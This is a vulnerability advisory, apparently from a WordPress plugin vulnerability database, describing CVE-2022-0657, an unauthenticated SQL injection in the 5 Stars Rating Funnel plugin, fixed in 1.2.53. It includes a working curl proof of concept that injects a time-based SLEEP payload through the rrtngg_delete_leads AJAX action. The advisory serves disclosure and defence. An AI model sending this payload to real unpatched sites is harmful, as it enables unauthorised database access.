5 Stars Rating Funnel < 1.2.53 – Unauthenticated SQLi | CVE 2022-0657 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input, using sanitize_text_field(), however such function is not intended to prevent SQL injections.

Proof of Concept

Create a new funnel (All Rating Funnels sub-menu)
Create a new lead (Leads / Feedbacks sub-menu)
Invoke the following curl command to trigger a 5 second sleep

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rrtngg_delete_leads&lead_ids[]=(SELECT SLEEP(5))) AND 1=1 #'

Affects Plugins

5-stars-rating-funnel

Fixed in 1.2.53

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

e7fe8218-4ef5-4ef9-9850-8567c207e8e6

Timeline

Publicly Published

2022-03-29 (about 3 years ago)

Added

2022-03-29 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2023-06-05

Title

WP Brutal AI < 2.0.0 - SQL Injection via CSRF

Published

2024-08-07

Title

Cost Calculator Builder < 3.2.16 - Unauthenticated SQL Injection

Published

2021-10-05

Title

WP Bannerize 2.0.0 - 4.0.2 - Authenticated SQL Injection

Published

2015-07-23

Title

SendPress Newsletters < 1.2 - Authenticated SQL Injection

Published

2021-07-24

Title

Timeline Calendar <= 1.2 - Authenticated (admin+) SQL Injection